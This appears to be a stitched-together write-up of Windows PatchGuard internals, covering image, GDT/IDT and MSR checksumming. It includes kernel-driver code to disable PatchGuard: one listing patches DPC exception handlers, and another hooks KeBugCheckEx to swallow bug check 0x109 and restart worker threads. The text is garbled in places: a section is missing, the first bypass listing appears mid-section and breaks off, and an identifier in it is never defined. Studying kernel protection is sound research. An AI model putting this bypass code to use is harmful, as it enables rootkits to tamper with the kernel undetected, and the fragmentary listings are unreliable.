(1). Initializing the sub-contexts that protect system images
The key kernel images that PG protects are ntoskrnl.exe, hal.dll, and ndis.sys. A symbol address inside each of these images is passed to nt!PgCreateImageSubContext():
NTSTATUS PgCreateImageSubContext(
IN PPATCHGUARD_CONTEXT ParentContext,
IN LPVOID SymbolAddress);
For ntoskrnl.exe, the symbol address passed is that of nt!KiFilterFiberContext; for hal.dll, it is the address of HalInitializeProcessor; for ndis.sys, it is the image's entry point, obtained by calling nt!GetModuleEntryPoint. PgCreateImageSubContext() protects each image by generating several distinct PG sub-contexts.
The first sub-context holds the checksums of the image's sections (with some exceptions). The second and third hold the checksums of the image's IAT and Import Directory, respectively. The routines that allocate these sub-contexts all rely on one shared routine, which generates a protection sub-context holding the checksum of a block of memory. The checksum is computed using the random XOR key and the random rotate-bit count stored in the parent PG context structure. The shared routine and the state structure it fills in are defined as follows:
typedef struct BLOCK_CHECKSUM_STATE
{
ULONG Unknown;
ULONG64 BaseAddress;
ULONG BlockSize;
ULONG Checksum;
} BLOCK_CHECKSUM_STATE, *PBLOCK_CHECKSUM_STATE;
PPATCHGUARD_SUB_CONTEXT PgCreateBlockChecksumSubContext(
IN PPATCHGUARD_CONTEXT Context,
IN ULONG Unknown,
IN PVOID BlockAddress,
IN ULONG BlockSize,
IN ULONG SubContextSize,
OUT PBLOCK_CHECKSUM_STATE ChecksumState OPTIONAL);
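The Unknown member of BLOCK_CHECKSUM_STATE is taken from the Unknown parameter of nt!PgCreateBlockChecksumSubContext(). During debugging this value was 0; its purpose is unknown.
The checksum algorithm used by PgCreateBlockChecksumSubContext() is simple. In pseudocode: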
ULONG64 Checksum = Context->RandomHashXorSeed;
ULONG Checksum32;
// Checksum 64-bit blocks
while (BlockSize >= sizeof(ULONG64))
{
Checksum ^= *(PULONG64)BaseAddress;
Checksum = RotateLeft(Checksum, Context->RandomHashRotateBits);
BlockSize -= sizeof(ULONG64);
BaseAddress += sizeof(ULONG64);
}
// Checksum the remaining bytes that do not fill a 64-bit block
while (BlockSize-- > 0)
{
Checksum ^= *(PUCHAR)BaseAddress;
Checksum = RotateLeft(Checksum, Context->RandomHashRotateBits);
BaseAddress++;
}
Checksum32 = (ULONG)Checksum;
Checksum >>= 31;
do
{
Checksum32 ^= (ULONG)Checksum;
Checksum >>= 31;
} while (Checksum);
Checksum32 is the final checksum; it is stored in the BLOCK_CHECKSUM_STATE.
To initialize the checksums of the image's sections, nt!PgCreateImageSubContext() calls the following function:
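The pseudocode above can be exercised in user mode. What follows is only a minimal sketch of the same rotate-and-XOR scheme: the names pg_block_checksum and rotl64 are hypothetical, and the seed and rotate count are passed as plain parameters here instead of being read from a PG context.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Rotate a 64-bit value left; a count of 0 is handled separately so the
 * right shift never shifts by 64. */
static uint64_t rotl64(uint64_t value, unsigned bits)
{
    bits &= 63;
    return bits ? (value << bits) | (value >> (64 - bits)) : value;
}

/* Hypothetical user-mode rendition of the checksum pseudocode. */
uint32_t pg_block_checksum(const void *block, size_t size,
                           uint64_t xor_seed, unsigned rotate_bits)
{
    const unsigned char *p = (const unsigned char *)block;
    uint64_t sum = xor_seed;
    uint32_t folded;

    assert(block != NULL || size == 0);

    /* Whole 64-bit blocks first. */
    while (size >= sizeof(uint64_t)) {
        uint64_t qword;
        memcpy(&qword, p, sizeof(qword));   /* avoids unaligned access */
        sum = rotl64(sum ^ qword, rotate_bits);
        p += sizeof(qword);
        size -= sizeof(qword);
    }

    /* Then the trailing bytes, one at a time. */
    while (size-- > 0)
        sum = rotl64(sum ^ *p++, rotate_bits);

    /* Fold the 64-bit value into 32 bits, 31 bits per step. */
    folded = (uint32_t)sum;
    sum >>= 31;
    do {
        folded ^= (uint32_t)sum;
        sum >>= 31;
    } while (sum);

    return folded;
}
```

Computing the value once when the sub-context is created and again at verification time, with the same seed and rotate count, is what lets a changed byte in the block show up as a mismatch.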
PPATCHGUARD_SUB_CONTEXT PgCreateImageSectionSubContext(
IN PPATCHGUARD_CONTEXT ParentContext,
IN PVOID SymbolAddress,
IN ULONG SubContextSize,
IN PVOID ImageBase);
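PgCreateImageSectionSubContext() first checks whether nt!KiOpPrefetchPatchCount is zero. If it is not zero, the block checksum context that gets created does not cover all of the sections in the image. Otherwise, the function enumerates the sections of the image and computes a checksum for each one, skipping the INIT, PAGEVRFY, PAGESPEC, and PAGEKD sections.
In addition, PgCreateImageSectionSubContext() calls nt!PgCreateBlockChecksumSubContext() to compute the checksums of the image's IAT and Import Directory.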
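The section filtering described above amounts to a name comparison against a short exclusion list. The sketch below shows one way to express it; section_is_checksummed and kSkippedSections are hypothetical names, and the only facts taken from the text are the four excluded section names. It assumes the 8-byte, NUL-padded section names used by the PE format.

```c
#include <assert.h>
#include <string.h>

#define SECTION_NAME_LEN 8  /* PE section names are 8 bytes, NUL-padded */

/* Sections that the text says are left out of the checksum. */
static const char *const kSkippedSections[] = {
    "INIT", "PAGEVRFY", "PAGESPEC", "PAGEKD"
};

/* Returns 1 if a section with this name would be checksummed, 0 if it
 * would be skipped. The name may be exactly 8 bytes with no terminator. */
int section_is_checksummed(const char *name)
{
    size_t i;

    assert(name != NULL);

    for (i = 0; i < sizeof(kSkippedSections) / sizeof(kSkippedSections[0]); i++) {
        if (strncmp(name, kSkippedSections[i], SECTION_NAME_LEN) == 0)
            return 0;
    }
    return 1;
}
```

Comparing at most eight characters keeps the check safe for names that fill the whole field, such as PAGEVRFY, which carry no terminating NUL in the section header.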
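(3). Initializing the sub-contexts that protect the GDT/IDT
The GDT describes the memory segments used by the kernel. It is an attractive target for malicious code, because modifying certain GDT entries can allow a non-privileged user-mode application to modify kernel memory. The IDT is useful in both malicious and legitimate contexts: in some cases a third party may want to intercept particular hardware or software interrupts before they reach the kernel, that is, hook the IDT.
PG protects the GDT and IDT mainly by calling nt!PgCreateBlockChecksumSubContext(), passing in the appropriate context for each table. Because the registers that hold the GDT and IDT information are per-processor, PG has to create a separate context for each of the two tables on every processor. To get the GDT and IDT addresses for a given processor, PG first calls nt!KeSetAffinityThread() to make sure it is running on that processor, then calls nt!KiGetGdtIdt() to obtain the base addresses of the GDT and IDT. This function is defined as follows: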
VOID KiGetGdtIdt(
OUT PVOID *Gdt,
OUT PVOID *Idt);
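The text does not describe how nt!KiGetGdtIdt() works internally. On x64 the processor exposes each table through a 10-byte pseudo-descriptor (a 16-bit limit followed by a 64-bit base), which is what the sgdt and sidt instructions store. Assuming a routine like this one reads those registers, the sketch below decodes such a buffer into the base and byte length that a block checksum would need. The names table_region and parse_pseudo_descriptor are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Base address and length in bytes of a descriptor table. */
typedef struct {
    uint64_t base;
    size_t   size;
} table_region;

/* Decode the 10-byte pseudo-descriptor layout used in 64-bit mode:
 * bytes 0-1 hold the limit, bytes 2-9 hold the base, little-endian. */
table_region parse_pseudo_descriptor(const uint8_t raw[10])
{
    table_region region;
    uint16_t limit;
    int i;

    assert(raw != NULL);

    limit = (uint16_t)(raw[0] | (raw[1] << 8));

    region.base = 0;
    for (i = 7; i >= 0; i--)
        region.base = (region.base << 8) | raw[2 + i];

    /* The limit is the offset of the last valid byte, so the table
     * occupies limit + 1 bytes. */
    region.size = (size_t)limit + 1;
    return region;
}
```

Because the registers behind these values are per-processor, the decoded region is only meaningful for the processor on which the buffer was captured.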
Although a single function retrieves both base addresses, the actual protection of the GDT and the IDT is set up in two separate functions, nt!PgCreateGdtSubContext() and nt!PgCreateIdtSubContext(), defined as follows:
PPATCHGUARD_SUB_CONTEXT PgCreateGdtSubContext(
IN PPATCHGUARD_CONTEXT ParentContext,
IN UCHAR ProcessorNumber);
PPATCHGUARD_SUB_CONTEXT PgCreateIdtSubContext(
IN PPATCHGUARD_CONTEXT ParentContext,
IN UCHAR ProcessorNumber);
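Both functions are called in a loop that iterates over every processor in the machine, with nt!KeNumberProcessors giving the number of processors to cover.
(4). Initializing the sub-contexts that protect processor MSRs
The latest and greatest processors have greatly optimized the way user mode transitions to kernel mode. Previously, most operating systems, Windows included, dispatched system calls through a software interrupt. Newer processors provide dedicated instructions for system calls, such as syscall and sysenter. These instructions rely on a processor-defined Model-Specific Register (MSR) that holds the address of the kernel routine that receives control when a system call is made from user mode. On the x64 architecture, the MSR that controls this address is called LSTAR (Long System Target-Address Register), and its MSR index is 0xc0000082. During boot, the x64 kernel initializes this MSR to the address of nt!KiSystemCall64().
To prevent third parties from hooking system calls by changing the value of the LSTAR MSR, PG creates a sub-context of type 7 in PgCreateMsrSubContext() and caches the MSR's value in it: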
PPATCHGUARD_SUB_CONTEXT PgCreateMsrSubContext(
IN PPATCHGUARD_CONTEXT ParentContext,
IN UCHAR Processor);
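As with the GDT/IDT protection, the LSTAR MSR value is per-processor, so a separate copy has to be kept for each processor. To make sure the value is read from the right processor, PG calls nt!KeSetAffinityThread so that the thread reading the MSR is running on the processor in question.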
NTSTATUS DisablePatchGuard()
{
UNICODE_STRING SymbolName;
NTSTATUS Status = STATUS_SUCCESS;
PVOID * DpcRoutines = NULL;
PCHAR NtBaseAddress = NULL;
ULONG Offset;
RtlInitUnicodeString(
&SymbolName,
L"__C_specific_handler");
do
{
//
// Get the base address of nt
//
if (!RtlPcToFileHeader(
MmGetSystemRoutineAddress(&SymbolName),
(PCHAR *)&NtBaseAddress))
{
Status = STATUS_INVALID_IMAGE_FORMAT;
break;
}
//
// Search the image to find the first occurrence of:
//
// "AcpSFileIpFIIrp MutaNtFsNtrfSemaTCPc"
//
// This is the fake tag pool array that is used to allocate protection contexts.
//
__try
{
for (Offset = 0; !DpcRoutines; Offset += 4)
{
//
// If we find a match for the fake pool tag array, the DPC routine
// addresses will immediately follow.
//
if (memcmp(
NtBaseAddress + Offset,
CurrentFakePoolTagArray,
sizeof(CurrentFakePoolTagArray) - 1) == 0)
{
DpcRoutines = (PVOID *)(NtBaseAddress +
Offset + sizeof(CurrentFakePoolTagArray) + 3);
}
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
//
// If an exception occurs, we failed to find it. Time to bail out.
//
Status = GetExceptionCode();
break;
}
DebugPrint(("DPC routine array found at %p.",DpcRoutines));
//
// Walk the DPC routine array.
//
for (Offset = 0; DpcRoutines[Offset] && NT_SUCCESS(Status); Offset++)
{
PRUNTIME_FUNCTION Function;
ULONG64 ImageBase;
PCHAR UnwindBuffer;
UCHAR CodeCount;
ULONG HandlerOffset;
PCHAR HandlerAddress;
PVOID LockedAddress;
PMDL Mdl;
//
// If we find no function entry, then go on to the next entry.
//
if ((!(Function = RtlLookupFunctionEntry(
(ULONG64)DpcRoutines[Offset],
&ImageBase,
NULL))) || (!Function->UnwindData))
{
Status = STATUS_INVALID_IMAGE_FORMAT;
continue;
}
//
// Grab the unwind exception handler address if we’re able to find one.
//
UnwindBuffer = (PCHAR)(ImageBase + Function->UnwindData);
CodeCount = UnwindBuffer[2];
//
// The handler offset is found within the unwind data that is specific
// to the language in question. Specifically, it’s +0x10 bytes into
// the structure not including the UNWIND_INFO structure itself and any
// embedded codes (including padding). The calculation below accounts
// for all these and padding.
//
HandlerOffset = *(PULONG)((ULONG64)(UnwindBuffer + 3 +
(CodeCount * 2) + 20) & ~3);
//
// calculate the full address of the handler to patch.
//
HandlerAddress = (PCHAR)(ImageBase + HandlerOffset);
DebugPrint(("Exception handler for %p found at %p (unwind %p).",
DpcRoutines[Offset],
HandlerAddress,
UnwindBuffer));
//
// Finally, patch the routine to simply return with 1. We’ll patch with:
//
// 6A01 push byte 0x1
// 58 pop eax
// C3 ret
//
//
// Allocate a memory descriptor for the handler’s address.
//
if (!(Mdl = MmCreateMdl( NULL, (PVOID)HandlerAddress, 4)))
{
Status = STATUS_INSUFFICIENT_RESOURCES;
continue;
}
//
// Construct the Mdl and map the pages for kernel-mode access.
//
MmBuildMdlForNonPagedPool(Mdl);
if (!(LockedAddress = MmMapLockedPages(Mdl, KernelMode)))
{
IoFreeMdl(Mdl);
Status = STATUS_ACCESS_VIOLATION;
continue;
}
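The advantages of this approach are that it is small, relatively simple, and fairly fault tolerant. The drawbacks are that it requires the pool tag array to sit immediately before the array of DPC routine addresses, and that locating the pool tag array depends on a fixed value that Microsoft could easily eliminate in the future. For these reasons, it is best not to use this approach in a product.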
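The search step of this approach can be tried out in user mode against an ordinary buffer. The sketch below is a bounded variant: it walks the buffer in 4-byte steps like the listing does, but it stops at the end of the buffer instead of relying on an exception handler to end the scan. The names find_tag_array and TAG_NOT_FOUND are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define TAG_NOT_FOUND ((size_t)-1)

/* Scan image[0..image_size) in 4-byte steps for the tag bytes.
 * Returns the offset of the first match, or TAG_NOT_FOUND. */
size_t find_tag_array(const unsigned char *image, size_t image_size,
                      const char *tags, size_t tags_len)
{
    size_t off;

    assert(image != NULL && tags != NULL && tags_len > 0);

    /* The loop condition keeps every comparison inside the buffer. */
    for (off = 0; off + tags_len <= image_size; off += 4) {
        if (memcmp(image + off, tags, tags_len) == 0)
            return off;
    }
    return TAG_NOT_FOUND;
}
```

A match only tells the caller where the tag bytes are. Treating the data that follows as the DPC routine array is the layout assumption that makes the approach fragile.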
4.2. Hooking KeBugCheckEx
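One fact PG cannot get around is that it has to report a verification inconsistency somehow. More precisely, once patching has been detected, the reporting mechanism must bring the system down so that the third-party vendor's code cannot keep running. It does so by calling nt!KeBugCheckEx() with the bug check code 0x109 mentioned earlier. Using a BSoD here, rather than a black screen, an abrupt shutdown, or a reboot, lets the user know what happened. (Rather decent of Microsoft.)
The first idea the paper's author had for bypassing this technique was to make nt!KeBugCheckEx() return into the frame of the caller's caller. This is necessary because the compiler inserts a debugger trap immediately after the call to nt!KeBugCheckEx(), so returning to the caller itself is not possible, while returning to the caller's caller still might be. For example: FuncA calls FuncB, and FuncB hits the condition that leads to nt!KeBugCheckEx() being called; since we cannot return into FuncB, we return into FuncA's frame instead. However, as described earlier, PG zeroes out the stack before it calls nt!KeBugCheckEx(), so this way of hooking nt!KeBugCheckEx() looks like a dead end. As it turns out, it is not. (The author had me worried for a moment.)
This leads to another approach: rather than caring about the context stored in registers or on the stack, take advantage of the fact that every thread retains the address of its own entry point. For system worker threads, this entry point usually points to a function such as nt!ExpWorkerThread(). Many system worker threads share nt!ExpWorkerThread() as their entry point, but that is not a problem: the context argument passed to this function does not matter for any particular thread, because system worker threads exist only to process work items and expired DPC routines. With that in mind, the approach boils down to hooking nt!KeBugCheckEx() and checking whether the bug check code is 0x109. If it is not, the original nt!KeBugCheckEx() is called directly. If it is, the thread can be restarted by resetting the calling thread's stack pointer to its initial stack pointer minus 0x8 and then jumping to the thread's StartAddress. As a result, the thread simply goes back to processing work items and expired DPC routines as before.
An obvious alternative would be to simply terminate the calling thread, but that does not work: the OS keeps track of system worker threads and detects when one of them exits, and the exit of a system worker thread causes a BSoD. The code that hooks nt!KeBugCheckEx() is as follows: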
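The decision the hook makes, and the stack value it restarts the thread with, can be stated compactly. The sketch below uses hypothetical names (classify_bug_check, restart_stack_pointer) and assumes the thread's initial stack address is 16-byte aligned. Under the x64 calling convention a function is entered with the stack pointer 8 bytes below a 16-byte boundary, because the call instruction has just pushed a return address, and subtracting 0x8 reproduces that state.

```c
#include <assert.h>
#include <stdint.h>

#define PG_BUG_CHECK_CODE 0x109u  /* bug check code that PG reports with */

typedef enum {
    HOOK_PASS_THROUGH,    /* forward to the original KeBugCheckEx */
    HOOK_RESTART_THREAD   /* swallow the bug check and restart the thread */
} hook_action;

/* Decide what the hook should do for a given bug check code. */
hook_action classify_bug_check(uint32_t bug_check_code)
{
    return bug_check_code == PG_BUG_CHECK_CODE ? HOOK_RESTART_THREAD
                                                : HOOK_PASS_THROUGH;
}

/* Compute the stack pointer to restart the thread with. The 16-byte
 * alignment of the initial stack is an assumption of this sketch. */
uintptr_t restart_stack_pointer(uintptr_t initial_stack)
{
    assert(initial_stack % 16 == 0);
    return initial_stack - 8;
}
```

Every other bug check code has to reach the original routine unchanged, otherwise genuine crashes would be hidden along with the ones PG raises.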
== ext.asm==============
.data
EXTERN OrigKeBugCheckExRestorePointer:PROC
EXTERN KeBugCheckExHookPointer:PROC
.code
;
; Points the stack pointer at the supplied address, moves the thread argument
; into rcx, and jumps to the supplied start routine.
;
public AdjustStackCallPointer
AdjustStackCallPointer PROC
mov rsp, rcx
xchg r8, rcx
jmp rdx
AdjustStackCallPointer ENDP
;
; Wraps the overwritten preamble of KeBugCheckEx.
;
public OrigKeBugCheckEx
OrigKeBugCheckEx PROC
mov [rsp+8h], rcx
mov [rsp+10h], rdx
mov [rsp+18h], r8
lea rax, [OrigKeBugCheckExRestorePointer]
jmp qword ptr [rax]
OrigKeBugCheckEx ENDP
END
== antipatch.c===========
//
// Both of these routines reference the assembly code described
// above
//
extern VOID OrigKeBugCheckEx(
IN ULONG BugCheckCode,
IN ULONG_PTR BugCheckParameter1,
IN ULONG_PTR BugCheckParameter2,
IN ULONG_PTR BugCheckParameter3,
IN ULONG_PTR BugCheckParameter4);
extern VOID AdjustStackCallPointer(
IN ULONG_PTR NewStackPointer,
IN PVOID StartAddress,
IN PVOID Argument);
//
// mov rax, <64-bit address of the hook>
// jmp rax
//
static CHAR HookStub[] =
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xe0";
//
// The offset into the ETHREAD structure that holds the start routine.
//
static ULONG ThreadStartRoutineOffset = 0;
//
// The pointer into KeBugCheckEx after what has been overwritten by the hook.
//
PVOID OrigKeBugCheckExRestorePointer;
VOID KeBugCheckExHook(
IN ULONG BugCheckCode,
IN ULONG_PTR BugCheckParameter1,
IN ULONG_PTR BugCheckParameter2,
IN ULONG_PTR BugCheckParameter3,
IN ULONG_PTR BugCheckParameter4)
{
PUCHAR LockedAddress;
PCHAR ReturnAddress;
PMDL Mdl = NULL;
//
// Call the real KeBugCheckEx if this isn’t the bug check code we’re looking
// for.
//
if (BugCheckCode != 0x109)
{
DebugPrint(("Passing through bug check %.4x to %p.",
BugCheckCode,
OrigKeBugCheckEx));
OrigKeBugCheckEx(
BugCheckCode,
BugCheckParameter1,
BugCheckParameter2,
BugCheckParameter3,
BugCheckParameter4);
}
else
{
PCHAR CurrentThread = (PCHAR)PsGetCurrentThread();
PVOID StartRoutine = *(PVOID *)(CurrentThread + ThreadStartRoutineOffset);
PVOID StackPointer = IoGetInitialStack();
DebugPrint(("Restarting the current worker thread %p at %p (SP=%p, off=%lu).",
PsGetCurrentThread(),
StartRoutine,
StackPointer,
ThreadStartRoutineOffset));
//
// Shift the stack pointer back to its initial value and call the routine. We
// subtract eight to ensure that the stack is aligned properly as thread
// entry point routines would expect.
//
AdjustStackCallPointer((ULONG_PTR)StackPointer - 0x8,
StartRoutine,
NULL);
}
//
// In either case, we should never get here.
//
__debugbreak();
}
VOID DisablePatchProtectionSystemThreadRoutine(
IN PVOID Nothing)
{
UNICODE_STRING SymbolName;
NTSTATUS Status = STATUS_SUCCESS;
PUCHAR LockedAddress;
PUCHAR CurrentThread = (PUCHAR)PsGetCurrentThread();
PCHAR KeBugCheckExSymbol;
PMDL Mdl = NULL;
RtlInitUnicodeString(
&SymbolName,
L"KeBugCheckEx");
do
{
//
// Find the thread’s start routine offset.
//
for (ThreadStartRoutineOffset = 0;
ThreadStartRoutineOffset < 0x1000;
ThreadStartRoutineOffset += 4)
{
if (*(PVOID *)(CurrentThread +
ThreadStartRoutineOffset) == (PVOID)DisablePatchProtectionSystemThreadRoutine)
break;
}
DebugPrint(("Thread start routine offset is 0x%.4x.",
ThreadStartRoutineOffset));
//
// If we failed to find the start routine offset for some strange reason,
// then return not supported.
//
if (ThreadStartRoutineOffset >= 0x1000)
{
Status = STATUS_NOT_SUPPORTED;
break;
}
//
// Get the address of KeBugCheckEx.
//
if (!(KeBugCheckExSymbol = MmGetSystemRoutineAddress(&SymbolName)))
{
Status = STATUS_PROCEDURE_NOT_FOUND;
break;
}
//
// Calculate the restoration pointer.
//
OrigKeBugCheckExRestorePointer = (PVOID)(KeBugCheckExSymbol + 0xf);
//
// Create and initialize the MDL.
//
if (!(Mdl = MmCreateMdl(
NULL,
(PVOID)KeBugCheckExSymbol,
0xf)))
{
Status = STATUS_INSUFFICIENT_RESOURCES;
break;
}
MmBuildMdlForNonPagedPool(
Mdl);
//
// Probe & Lock.
//
if (!(LockedAddress = (PUCHAR)MmMapLockedPages(
Mdl,
KernelMode)))
{
IoFreeMdl(
Mdl);
Status = STATUS_ACCESS_VIOLATION;
break;
}
//
// Set the absolute address to our hook.
//
*(PULONG64)(HookStub + 0x2) = (ULONG64)KeBugCheckExHook;
DebugPrint(("Copying hook stub to %p from %p (Symbol %p).",
LockedAddress,
HookStub,
KeBugCheckExSymbol));
//
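// Copy the absolute jmp stub over the start of KeBugCheckEx. Only the
// 12 stub bytes are copied, since HookStub holds nothing beyond them.
//
RtlCopyMemory(
LockedAddress,
HookStub,
sizeof(HookStub) - 1);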
//
// Cleanup the MDL.
//
MmUnmapLockedPages(
LockedAddress,
Mdl);
IoFreeMdl(
Mdl);
} while (0);
}
//
// A pointer to KeBugCheckExHook
//
PVOID KeBugCheckExHookPointer = KeBugCheckExHook;
NTSTATUS DisablePatchProtection() {
OBJECT_ATTRIBUTES Attributes;
NTSTATUS Status;
HANDLE ThreadHandle = NULL;
InitializeObjectAttributes(
&Attributes,
NULL,
OBJ_KERNEL_HANDLE,
NULL,
NULL);
//
// Create the system worker thread so that we can automatically find the
// offset inside the ETHREAD structure to the thread’s start routine.
//
Status = PsCreateSystemThread(
&ThreadHandle,
THREAD_ALL_ACCESS,
&Attributes,
NULL,
NULL,
DisablePatchProtectionSystemThreadRoutine,
NULL);
if (ThreadHandle)
ZwClose(
ThreadHandle);
return Status;
}